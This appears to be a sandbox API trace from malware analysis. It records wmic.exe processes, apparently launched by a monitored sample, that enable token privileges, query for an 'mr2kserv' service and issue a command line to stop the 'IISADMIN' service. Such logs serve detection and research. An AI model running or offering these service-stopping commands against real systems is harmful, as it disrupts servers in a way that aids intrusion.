CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0295.906] IUnknown:Release (This=0x3667328) returned 0x0 [0295.906] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="InterrogateService", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3667328) returned 0x0 [0295.906] lstrlenW (lpString="InterrogateService") returned 18 [0295.906] lstrlenW (lpString="stopservice") returned 11 [0295.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0295.906] IUnknown:Release (This=0x3667328) returned 0x0 [0295.906] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="UserControlService", ppInSignature=0x323d634*=0x3690c20, ppOutSignature=0x323d630*=0x3693550) returned 0x0 [0295.906] lstrlenW (lpString="UserControlService") returned 18 [0295.906] lstrlenW (lpString="stopservice") returned 11 [0295.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0295.906] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.906] IUnknown:Release (This=0x3693550) returned 0x0 [0295.906] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="Create", ppInSignature=0x323d634*=0x3690c20, ppOutSignature=0x323d630*=0x36956a8) returned 0x0 [0295.907] lstrlenW (lpString="Create") returned 6 [0295.907] lstrlenW (lpString="stopservice") returned 11 [0295.907] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0295.907] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.907] IUnknown:Release (This=0x36956a8) returned 0x0 [0295.907] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="Change", ppInSignature=0x323d634*=0x3690c20, ppOutSignature=0x323d630*=0x3695428) returned 0x0 [0295.907] lstrlenW (lpString="Change") returned 6 [0295.907] lstrlenW (lpString="stopservice") returned 11 [0295.907] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0295.908] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.908] IUnknown:Release (This=0x3695428) returned 0x0 [0295.908] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="ChangeStartMode", ppInSignature=0x323d634*=0x3690c20, ppOutSignature=0x323d630*=0x36936d8) returned 0x0 [0295.908] lstrlenW (lpString="ChangeStartMode") returned 15 [0295.908] lstrlenW (lpString="stopservice") returned 11 [0295.908] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0295.908] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.908] IUnknown:Release (This=0x36936d8) returned 0x0 [0295.908] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="Delete", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3667328) returned 0x0 [0295.908] lstrlenW (lpString="Delete") returned 6 [0295.908] lstrlenW (lpString="stopservice") returned 11 [0295.908] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0295.908] IUnknown:Release (This=0x3667328) returned 0x0 [0295.908] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="GetSecurityDescriptor", ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x3690c20) returned 0x0 [0295.908] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0295.908] lstrlenW (lpString="stopservice") returned 11 [0295.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0295.909] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.909] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*="SetSecurityDescriptor", ppInSignature=0x323d634*=0x3690c20, ppOutSignature=0x323d630*=0x3693550) returned 0x0 [0295.909] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0295.909] lstrlenW (lpString="stopservice") returned 11 [0295.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0295.909] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.909] IUnknown:Release (This=0x3693550) returned 0x0 [0295.909] IWbemClassObject:NextMethod (in: This=0x3690a28, lFlags=0, pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0 | out: pstrName=0x323d638*=0x0, ppInSignature=0x323d634*=0x0, ppOutSignature=0x323d630*=0x0) returned 0x40005 [0295.909] IUnknown:Release (This=0x3690a28) returned 0x0 [0295.909] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.909] lstrlenW (lpString="SET") returned 3 [0295.909] lstrlenW (lpString="call") returned 4 [0295.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0295.909] lstrlenW (lpString="CREATE") returned 6 [0295.909] lstrlenW (lpString="call") returned 4 [0295.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0295.910] free (_Block=0x3912c80) [0295.910] malloc (_Size=0x4) returned 0x3912ee8 [0295.910] lstrlenW (lpString="GET") returned 3 [0295.910] lstrlenW (lpString="call") returned 4 [0295.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0295.910] lstrlenW (lpString="LIST") returned 4 [0295.910] lstrlenW (lpString="call") returned 4 [0295.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0295.910] lstrlenW (lpString="ASSOC") returned 5 [0295.910] lstrlenW (lpString="call") returned 4 [0295.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0295.910] WbemLocator:IUnknown:AddRef (This=0x3634870) returned 0x3 [0295.910] free (_Block=0x3912788) [0295.910] lstrlenW (lpString="") returned 0 [0295.910] lstrlenW (lpString="NQDPDE") returned 6 [0295.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0295.910] lstrlenW (lpString="NQDPDE") returned 6 [0295.910] malloc (_Size=0xe) returned 0x391ac48 [0295.910] lstrlenW (lpString="NQDPDE") returned 6 [0295.910] GetCurrentThreadId () returned 0xd44 [0295.910] GetCurrentProcess () returned 0xffffffff [0295.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x323f710 | out: TokenHandle=0x323f710*=0x2f8) returned 1 [0295.910] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x323f70c | out: TokenInformation=0x0, ReturnLength=0x323f70c) returned 0 [0295.910] malloc (_Size=0x118) returned 0x391b9b8 [0295.910] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x391b9b8, TokenInformationLength=0x118, ReturnLength=0x323f70c | out: TokenInformation=0x391b9b8, ReturnLength=0x323f70c) returned 1 [0295.911] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x391b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0295.911] free (_Block=0x391b9b8) [0295.911] CloseHandle (hObject=0x2f8) returned 1 [0295.911] lstrlenW (lpString="GET") returned 3 [0295.911] lstrlenW (lpString="call") returned 4 [0295.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0295.911] lstrlenW (lpString="LIST") returned 4 [0295.911] lstrlenW (lpString="call") returned 4 [0295.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0295.911] lstrlenW (lpString="SET") returned 3 [0295.911] lstrlenW (lpString="call") returned 4 [0295.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0295.911] lstrlenW (lpString="CALL") returned 4 [0295.911] lstrlenW (lpString="call") returned 4 [0295.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0295.911] ??0CHString@@QAE@XZ () returned 0x323f6d0 [0295.911] GetCurrentThreadId () returned 0xd44 [0295.911] malloc (_Size=0xc) returned 0x391ac78 [0295.912] malloc (_Size=0xc) returned 0x391ad08 [0295.912] malloc (_Size=0xc) returned 0x391ad80 [0295.912] malloc (_Size=0xc) returned 0x391adb0 [0295.912] malloc (_Size=0xc) returned 0x39199b8 [0295.912] SysStringLen (param_1="\\\\") returned 0x2 [0295.912] SysStringLen (param_1="NQDPDE") returned 0x6 [0295.912] malloc (_Size=0xc) returned 0x391bef8 [0295.912] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0295.912] SysStringLen (param_1="\\") returned 0x1 [0295.912] malloc (_Size=0xc) returned 0x391bf28 [0295.912] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0295.912] SysStringLen (param_1="root\\cimv2") returned 0xa [0295.913] free (_Block=0x391bef8) [0295.913] free (_Block=0x39199b8) [0295.913] free (_Block=0x391adb0) [0295.913] free (_Block=0x391ad80) [0295.913] free (_Block=0x391ad08) [0295.913] free (_Block=0x391ac78) [0295.913] malloc (_Size=0xc) returned 0x391bf70 [0295.913] malloc (_Size=0xc) returned 0x391bec8 [0295.913] malloc (_Size=0xc) returned 0x391bfb8 [0295.913] WbemLocator:IWbemLocator:ConnectServer (in: This=0x3634870, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x3691510) returned 0x0 [0295.925] free (_Block=0x391bfb8) [0295.925] free (_Block=0x391bec8) [0295.925] free (_Block=0x391bf70) [0295.925] CoSetProxyBlanket (pProxy=0x3691510, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0295.925] free (_Block=0x391bf28) [0295.925] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.925] ??0CHString@@QAE@XZ () returned 0x323f6c8 [0295.925] GetCurrentThreadId () returned 0xd44 [0295.926] malloc (_Size=0x38) returned 0x391b9b8 [0295.926] malloc (_Size=0x28) returned 0x391b9f8 [0295.926] malloc (_Size=0x28) returned 0x391ba28 [0295.926] malloc (_Size=0x38) returned 0x391ba58 [0295.926] malloc (_Size=0x38) returned 0x391ba98 [0295.926] malloc (_Size=0x24) returned 0x391bad8 [0295.926] malloc (_Size=0xc) returned 0x391ac78 [0295.926] lstrlenA (lpString="") returned 0 [0295.926] malloc (_Size=0x2) returned 0x3912788 [0295.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3912788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0295.926] free (_Block=0x3912788) [0295.926] malloc (_Size=0x38) returned 0x391bb08 [0295.926] malloc (_Size=0x24) returned 0x391bb48 [0295.926] malloc (_Size=0xc) returned 0x391ad08 [0295.926] free (_Block=0x391ac78) [0295.926] IWbemServices:GetObject (in: This=0x3691510, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x323f6a0*=0x0, ppCallResult=0x0 | out: ppObject=0x323f6a0*=0x3690a28, ppCallResult=0x0) returned 0x0 [0295.999] malloc (_Size=0xc) returned 0x391adb0 [0295.999] IWbemClassObject:GetMethod (in: This=0x3690a28, wszName="stopservice", lFlags=0, ppInSignature=0x323f6bc, ppOutSignature=0x323f69c | out: ppInSignature=0x323f6bc*=0x0, ppOutSignature=0x323f69c*=0x3690c20) returned 0x0 [0295.999] free (_Block=0x391adb0) [0295.999] IUnknown:Release (This=0x3690c20) returned 0x0 [0295.999] IUnknown:Release (This=0x3690a28) returned 0x0 [0295.999] ??0CHString@@QAE@XZ () returned 0x323f580 [0295.999] GetCurrentThreadId () returned 0xd44 [0295.999] malloc (_Size=0xc) returned 0x391ac78 [0295.999] lstrlenA (lpString="") returned 0 [0295.999] malloc (_Size=0x2) returned 0x3912788 [0295.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3912788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0295.999] free (_Block=0x3912788) [0295.999] malloc (_Size=0xc) returned 0x391ad80 [0295.999] lstrlenA (lpString="") returned 0 [0295.999] malloc (_Size=0x2) returned 0x3912788 [0296.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3912788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0296.000] free (_Block=0x3912788) [0296.000] malloc (_Size=0xc) returned 0x391adb0 [0296.000] free (_Block=0x391ad80) [0296.000] malloc (_Size=0xc) returned 0x391ad80 [0296.000] lstrlenA (lpString="SELECT * FROM ") returned 14 [0296.000] malloc (_Size=0x1e) returned 0x391bb78 [0296.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x391bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0296.000] free (_Block=0x391bb78) [0296.000] malloc (_Size=0xc) returned 0x39199b8 [0296.000] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0296.000] SysStringLen (param_1="Win32_Service") returned 0xd [0296.000] free (_Block=0x391ad80) [0296.000] malloc (_Size=0xc) returned 0x391ad80 [0296.000] malloc (_Size=0xc) returned 0x391bf88 [0296.000] lstrlenA (lpString=" WHERE ") returned 7 [0296.000] malloc (_Size=0x10) returned 0x391bdc0 [0296.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x391bdc0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0296.000] free (_Block=0x391bdc0) [0296.001] malloc (_Size=0xc) returned 0x391bd18 [0296.001] SysStringLen (param_1=" WHERE ") returned 0x7 [0296.001] SysStringLen (param_1="name like '%%mr2kserv%%'") returned 0x18 [0296.001] malloc (_Size=0xc) returned 0x391bf70 [0296.001] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0296.001] SysStringLen (param_1=" WHERE name like '%%mr2kserv%%'") returned 0x1f [0296.001] free (_Block=0x39199b8) [0296.001] free (_Block=0x391bd18) [0296.001] free (_Block=0x391bf88) [0296.001] free (_Block=0x391ad80) [0296.001] malloc (_Size=0xc) returned 0x391bef8 [0296.001] IWbemServices:ExecQuery (in: This=0x3691510, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%mr2kserv%%'", lFlags=48, pCtx=0x0, ppEnum=0x323f58c | out: ppEnum=0x323f58c*=0x3694810) returned 0x0 [0296.017] free (_Block=0x391bef8) [0296.017] CoSetProxyBlanket (pProxy=0x3694810, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0296.025] IEnumWbemClassObject:Next (in: This=0x3694810, lTimeout=-1, uCount=0x1, apObjects=0x323f588, puReturned=0x323f578 | out: apObjects=0x323f588*=0x0, puReturned=0x323f578*=0x0) returned 0x1 [0297.169] IUnknown:Release (This=0x3694810) returned 0x0 [0297.170] free (_Block=0x391bf70) [0297.170] free (_Block=0x391adb0) [0297.171] free (_Block=0x391ac78) [0297.171] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.171] free (_Block=0x391ad08) [0297.171] free (_Block=0x391bad8) [0297.171] free (_Block=0x391ba98) [0297.171] free (_Block=0x391ba58) [0297.171] free (_Block=0x391ba28) [0297.171] free (_Block=0x391b9f8) [0297.171] free (_Block=0x391bb48) [0297.171] free (_Block=0x391bb08) [0297.171] free (_Block=0x391b9b8) [0297.171] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.171] GetCurrentThreadId () returned 0xd44 [0297.171] ??0CHString@@QAE@PBG@Z () returned 0x323f740 [0297.171] ??YCHString@@QAEABV0@PBG@Z () returned 0x323f740 [0297.171] malloc (_Size=0x800) returned 0x391c0c0 [0297.171] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x391c0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0297.172] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0297.172] malloc (_Size=0x1c) returned 0x391b9b8 [0297.172] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x391b9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0297.172] __iob_func () returned 0x776f2608 [0297.172] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0297.172] __iob_func () returned 0x776f2608 [0297.172] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0297.173] free (_Block=0x391b9b8) [0297.173] free (_Block=0x391c0c0) [0297.173] ??1CHString@@QAE@XZ () returned 0x1 [0297.173] WbemLocator:IUnknown:Release (This=0x3691510) returned 0x0 [0297.173] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0297.173] _kbhit () returned 0x0 [0297.178] free (_Block=0x3912ee8) [0297.178] free (_Block=0x391ac00) [0297.179] free (_Block=0x391abe8) [0297.179] free (_Block=0x391abb8) [0297.179] free (_Block=0x391ad68) [0297.179] free (_Block=0x391b058) [0297.179] free (_Block=0x391b188) [0297.179] free (_Block=0x3919da8) [0297.179] free (_Block=0x391b208) [0297.179] free (_Block=0x391acf0) [0297.179] free (_Block=0x3912c60) [0297.179] free (_Block=0x3910520) [0297.179] free (_Block=0x391bc88) [0297.179] free (_Block=0x391ac30) [0297.179] free (_Block=0x391adc8) [0297.179] free (_Block=0x391bc48) [0297.179] free (_Block=0x391bc08) [0297.179] free (_Block=0x391ac90) [0297.179] free (_Block=0x391aca8) [0297.179] free (_Block=0x391acc0) [0297.179] free (_Block=0x391bbd8) [0297.179] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0297.179] free (_Block=0x391b0f0) [0297.179] free (_Block=0x391ad50) [0297.179] free (_Block=0x3910568) [0297.179] free (_Block=0x391acd8) [0297.179] free (_Block=0x391b1c8) [0297.179] free (_Block=0x391ac60) [0297.180] free (_Block=0x3912c40) [0297.180] free (_Block=0x39126b0) [0297.180] free (_Block=0x39126f8) [0297.180] free (_Block=0x3912740) [0297.180] free (_Block=0x391ac48) [0297.180] free (_Block=0x39127c8) [0297.180] free (_Block=0x3910508) [0297.180] free (_Block=0x3912a00) [0297.180] free (_Block=0x39104f0) [0297.180] free (_Block=0x3912aa0) [0297.180] free (_Block=0x39104d8) [0297.180] free (_Block=0x3912a40) [0297.180] free (_Block=0x3912908) [0297.180] free (_Block=0x3912920) [0297.180] free (_Block=0x39128d0) [0297.180] free (_Block=0x39128e8) [0297.180] free (_Block=0x3912940) [0297.180] free (_Block=0x3912958) [0297.180] free (_Block=0x39104a0) [0297.180] free (_Block=0x39104b8) [0297.180] free (_Block=0x3912860) [0297.180] free (_Block=0x3912878) [0297.180] free (_Block=0x3912828) [0297.180] free (_Block=0x3912840) [0297.180] free (_Block=0x3912898) [0297.180] free (_Block=0x39128b0) [0297.181] free (_Block=0x39127f0) [0297.181] free (_Block=0x3912808) [0297.181] free (_Block=0x39127a0) [0297.181] free (_Block=0x3911200) [0297.181] free (_Block=0x391afd0) [0297.181] WbemLocator:IUnknown:Release (This=0x3634870) returned 0x2 [0297.181] WbemLocator:IUnknown:Release (This=0x363aeb0) returned 0x0 [0297.181] WbemLocator:IUnknown:Release (This=0x3634870) returned 0x1 [0297.181] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0297.181] WbemLocator:IUnknown:Release (This=0x3634870) returned 0x0 [0297.181] free (_Block=0x391ab58) [0297.182] free (_Block=0x391abd0) [0297.182] free (_Block=0x3912ba0) [0297.182] free (_Block=0x391ab70) [0297.182] free (_Block=0x391ab88) [0297.182] free (_Block=0x3912be0) [0297.182] free (_Block=0x391ae10) [0297.182] free (_Block=0x391ae70) [0297.182] free (_Block=0x39129e0) [0297.182] free (_Block=0x391ac18) [0297.182] free (_Block=0x391ade0) [0297.182] free (_Block=0x3912b00) [0297.182] free (_Block=0x391aed0) [0297.182] free (_Block=0x391aea0) [0297.182] free (_Block=0x3912d60) [0297.182] free (_Block=0x391aeb8) [0297.182] free (_Block=0x391ae58) [0297.182] free (_Block=0x3912ca0) [0297.182] free (_Block=0x391ad20) [0297.182] free (_Block=0x391ad38) [0297.182] free (_Block=0x3912b40) [0297.182] free (_Block=0x391aba0) [0297.182] free (_Block=0x391ab40) [0297.182] free (_Block=0x3912b80) [0297.183] free (_Block=0x3919988) [0297.183] free (_Block=0x391ae28) [0297.183] free (_Block=0x3912a80) [0297.183] free (_Block=0x391ae88) [0297.183] free (_Block=0x391ae40) [0297.183] free (_Block=0x3912d20) [0297.183] free (_Block=0x391ad98) [0297.183] free (_Block=0x391adf8) [0297.183] free (_Block=0x3912b20) [0297.183] free (_Block=0x391ab10) [0297.183] free (_Block=0x391ab28) [0297.183] free (_Block=0x3912bc0) [0297.183] free (_Block=0x3919850) [0297.183] free (_Block=0x3919940) [0297.183] free (_Block=0x3912ae0) [0297.183] free (_Block=0x3919898) [0297.183] free (_Block=0x3919910) [0297.183] free (_Block=0x3912ac0) [0297.183] free (_Block=0x39198f8) [0297.183] free (_Block=0x39198e0) [0297.183] free (_Block=0x3912b60) [0297.183] free (_Block=0x3919928) [0297.183] free (_Block=0x3919820) [0297.183] free (_Block=0x39129c0) [0297.184] free (_Block=0x3919970) [0297.184] free (_Block=0x3919868) [0297.184] free (_Block=0x3912a60) [0297.184] free (_Block=0x39198b0) [0297.184] free (_Block=0x39197f0) [0297.184] free (_Block=0x3912a20) [0297.184] free (_Block=0x39199a0) [0297.184] free (_Block=0x3919958) [0297.184] free (_Block=0x39129a0) [0297.184] free (_Block=0x3919808) [0297.184] free (_Block=0x3919838) [0297.184] free (_Block=0x3912c20) [0297.184] free (_Block=0x3919880) [0297.184] free (_Block=0x39198c8) [0297.184] free (_Block=0x3912d40) [0297.184] CoUninitialize () [0297.209] exit (_Code=0) [0297.209] free (_Block=0x391aee8) [0297.210] free (_Block=0x3911008) [0297.210] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.210] free (_Block=0x3912e10) [0297.210] free (_Block=0x39127e0) [0297.210] free (_Block=0x3910fe8) [0297.210] free (_Block=0x3910fc8) [0297.210] free (_Block=0x3910f98) [0297.210] free (_Block=0x3910f78) [0297.210] free (_Block=0x3910f48) [0297.210] free (_Block=0x3910f08) [0297.210] free (_Block=0x3910ee8) [0297.210] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.210] free (_Block=0x3912c00) Thread: id = 276 os_tid = 0xe6c Thread: id = 277 os_tid = 0x1168 Thread: id = 278 os_tid = 0x11a0 Thread: id = 279 os_tid = 0x7b0 Process: id = "25" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1d91b000" os_pid = "0x11c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 281 os_tid = 0x115c [0297.404] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0297.404] __set_app_type (_Type=0x1) [0297.404] __p__fmode () returned 0x776f3c14 [0297.404] __p__commode () returned 0x776f49ec [0297.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0297.404] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0297.405] ??0CHString@@QAE@XZ () returned 0xa685ec [0297.405] malloc (_Size=0x18) returned 0x780ee8 [0297.405] malloc (_Size=0x38) returned 0x780f08 [0297.405] malloc (_Size=0x28) returned 0x780f48 [0297.405] malloc (_Size=0x18) returned 0x780f78 [0297.405] malloc (_Size=0x24) returned 0x780f98 [0297.405] malloc (_Size=0x18) returned 0x780fc8 [0297.405] malloc (_Size=0x18) returned 0x780fe8 [0297.405] ??0CHString@@QAE@XZ () returned 0xa688fc [0297.405] malloc (_Size=0x18) returned 0x781008 [0297.405] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0297.405] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0297.406] _onexit (_Func=0xa5f370) returned 